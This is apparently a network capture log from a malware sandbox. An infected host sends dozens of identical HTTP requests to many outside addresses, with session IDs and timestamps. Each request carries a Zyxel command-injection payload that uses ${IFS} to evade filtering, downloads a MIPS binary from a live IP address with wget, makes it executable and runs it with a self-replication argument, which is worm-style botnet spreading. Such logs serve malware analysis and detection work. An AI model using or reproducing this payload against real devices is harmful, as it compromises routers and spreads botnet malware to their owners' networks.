                                          Jan 14, 2024 15:46:14.961817026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3888192.168.2.234543031.104.15.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961855888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3889192.168.2.2338632210.105.155.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961880922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3890192.168.2.2338724112.87.50.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961914062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3891192.168.2.2355554196.251.49.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961949110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3892192.168.2.2352008180.224.33.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.961994886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3893192.168.2.2344902183.76.35.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962021112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3894192.168.2.2354976116.225.170.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962035894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3895192.168.2.2346908152.166.213.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962053061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3896192.168.2.235846088.100.235.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962096930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3897192.168.2.233657495.101.6.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962150097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3898192.168.2.2352344200.105.190.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962182999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3899192.168.2.2360438217.28.5.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962229967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3900192.168.2.234981638.57.214.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962246895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3901192.168.2.2353112145.88.229.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962268114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3902192.168.2.233655220.75.75.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962347984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3903192.168.2.234024664.34.242.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962366104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3904192.168.2.2340454178.247.53.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962423086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3905192.168.2.234949660.92.163.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962424040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3906192.168.2.233939679.142.128.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962498903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3907192.168.2.2348530110.143.62.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962529898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3908192.168.2.2339844165.200.9.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962564945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3909192.168.2.233411849.42.233.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962605953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3910192.168.2.2335270178.23.175.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962629080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3911192.168.2.2350086206.74.9.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962698936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3912192.168.2.2348378191.192.152.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962740898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3913192.168.2.2343516162.100.95.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962762117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3914192.168.2.2345730133.146.114.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962836027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3915192.168.2.2342606204.163.96.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962856054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3916192.168.2.2342994149.255.226.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962901115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3917192.168.2.2340116181.78.171.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962918997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3918192.168.2.2349388118.75.8.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962939024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3919192.168.2.2335932134.232.85.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.962994099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3920192.168.2.2355824116.144.85.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963012934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3921192.168.2.2352370110.252.226.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963053942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3922192.168.2.234245636.43.134.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963104010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3923192.168.2.2336112161.97.57.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963155031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3924192.168.2.2336204185.116.142.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963169098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3925192.168.2.2355198200.65.7.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963238001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3926192.168.2.235686620.212.56.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963278055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3927192.168.2.2344124122.3.53.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963329077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3928192.168.2.2339106142.165.133.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963350058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3929192.168.2.2357108185.227.163.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963393927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3930192.168.2.2360476195.150.50.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963423014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3931192.168.2.2356274155.84.144.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963476896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3932192.168.2.2357394213.66.13.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963531971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3933192.168.2.233333231.170.126.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963567019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3934192.168.2.233576259.45.163.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963607073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3935192.168.2.2342340167.81.38.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963608980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3936192.168.2.2335580131.157.116.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963637114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3937192.168.2.2346566209.201.212.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963671923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3938192.168.2.2336774206.178.22.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963732958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3939192.168.2.235099695.196.94.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963758945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3940192.168.2.2349854223.112.218.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963798046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3941192.168.2.2352688195.204.111.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963831902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3942192.168.2.2348256210.64.129.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963848114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3943192.168.2.2347538110.20.211.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963912010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3944192.168.2.233309813.70.30.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963932037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3945192.168.2.233653265.119.206.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.963987112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3946192.168.2.234884668.241.187.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964015007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3947192.168.2.235853680.238.217.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964082956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3948192.168.2.2347686131.161.163.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964107990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3949192.168.2.2343016148.79.123.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:14.964143991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3950192.168.2.235025058.37.68.224443
                                          TimestampBytes transferredDirectionData
